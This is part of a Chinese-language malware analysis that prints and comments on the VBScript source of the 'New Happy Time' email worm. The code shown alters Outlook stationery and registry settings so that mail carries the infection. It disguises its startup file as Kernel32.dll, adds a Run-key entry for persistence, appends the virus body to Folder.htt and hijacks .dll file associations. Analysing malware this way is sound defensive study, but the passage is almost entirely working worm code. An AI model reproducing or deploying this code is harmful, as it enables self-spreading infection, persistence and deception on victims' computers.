新欢乐时光代码分析(4)

    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery", "blank")
    KJummageFolder(Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function


' 函数:KJCreateMilieu()
' 功能：创建系统环境

Function KJCreateMilieu()
    On Error Resume Next
    TempPath = ""
    ' 判断操作系统是NT/2000还是9X
    If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
        TempPath = "system32\"
    End If
    ' 为了文件名起到迷惑性，并且不会与系统文件冲突。
    ' 如果是NT/2000则启动文件为system\Kernel32.dll
    ' 如果是9x启动文件则为system\Kernel.dll
    If TempPath = "system32\" Then
        StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
    Else
        StartUpFile = WinPath & "SYSTEM\Kernel.dll"
    End If
    ' 添加Run值，添加刚才生成的启动文件路径
    WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile
    ' 拷贝前期备份的文件到原来的目录
    FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"
    FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop.ini"
    ' 向%windir%\web\Folder.htt追加病毒体
    Call KJAppendTo(WinPath & "web\Folder.htt", "htt")
    ' 改变dll的MIME头
    ' 改变dll的默认图标
    ' 改变dll的打开方式
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"